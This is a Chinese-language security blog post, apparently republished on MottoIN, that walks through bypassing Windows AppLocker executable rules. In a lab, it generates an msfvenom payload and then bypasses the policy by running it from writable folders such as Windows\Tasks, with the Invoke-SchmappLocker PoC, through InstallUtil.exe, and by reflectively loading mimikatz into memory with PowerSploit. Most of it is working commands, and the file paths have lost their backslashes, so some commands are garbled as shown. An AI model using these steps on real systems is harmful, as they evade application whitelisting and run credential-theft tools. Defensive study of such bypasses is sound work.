bypass AppLocker on the exe

一、配置applocker

启动AppIDSvc服务

《bypass AppLocker on the exe》

gpedit.msc->计算机配置->windows设置->安全设置->应用程序控制策略->AppLocker

点击可执行程序,创建默认规则

《bypass AppLocker on the exe》

 

除了上图中的的路径外的程序,其他路径的程序都无法执行。

当前用户属于users组用户

《bypass AppLocker on the exe》

shell.exe作用是弹出计算器,无法执行shell.exe被策略拦了。

msfvenom -p windows/exec cmd="calc.exe" -f exe -o shell.exe

《bypass AppLocker on the exe》

 

二、bypass

1、利用可写入路径

默认情况下这三个文件夹所有用户都有写入权限,可以把payload放到该目录执行。

C:WindowsTasks
C:WindowsTemp
C:Windowstracing
copy shell.exe C:WindowsTasksshell.exe & C:WindowsTasksshell.exe

《bypass AppLocker on the exe》

 

二、CreateRestrictedToken

使用Windows API(CreateRestrictedToken)加载其他exe程序,在KB2532445 中修复

poc地址:https://github.com/strictlymike/Invoke-SchmappLocker/blob/master/Invoke-SchmappLocker.ps1
C:Userstest1Desktop>powershell -exec bypass
Windows PowerShell
版权所有 (C) 2009 Microsoft Corporation。保留所有权利。

PS C:Userstest1Desktop> import-module .Invoke-SchmappLocker.ps1
PS C:Userstest1Desktop> Invoke-SchmappLocker C:Userstest1Desktopshell.exe

《bypass AppLocker on the exe》

三、installutil

编译可执行文件

C:WindowsMicrosoft.NETFrameworkv4.0.30319csc.exe c:windowstempexec.cs

执行可执行文件

C:WindowsMicrosoft.NETFrameworkv4.0.30319InstallUtil.exe /logfile= /LogToConsole=false /U c:windowstempexec.exe

四、内存直接加载PE文件

https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-ReflectivePEInjection.ps1

是不能直接运行的

《bypass AppLocker on the exe》

直接加载至内存运行

C:WindowsSysWOW64WindowsPowerShellv1.0>powershell -exec bypass
PS C:WindowsSysWOW64WindowsPowerShellv1.0> import-module C:Userstest1DesktopInvoke-ReflectivePEInjection.ps1
PS C:WindowsSysWOW64WindowsPowerShellv1.0> Invoke-ReflectivePEInjection -PEPath C:Userstest1Desktopmimikatz.exe

成功!

《bypass AppLocker on the exe》

本文来自ringk3y,经授权后发布,本文观点不代表MottoIN立场,转载请联系原作者。

发表评论

登录后才能评论

联系我们

021-62666911

在线咨询:点击这里给我发消息

邮件:root@mottoin.com

工作时间:周一至周五,9:30-18:30,节假日休息

QR code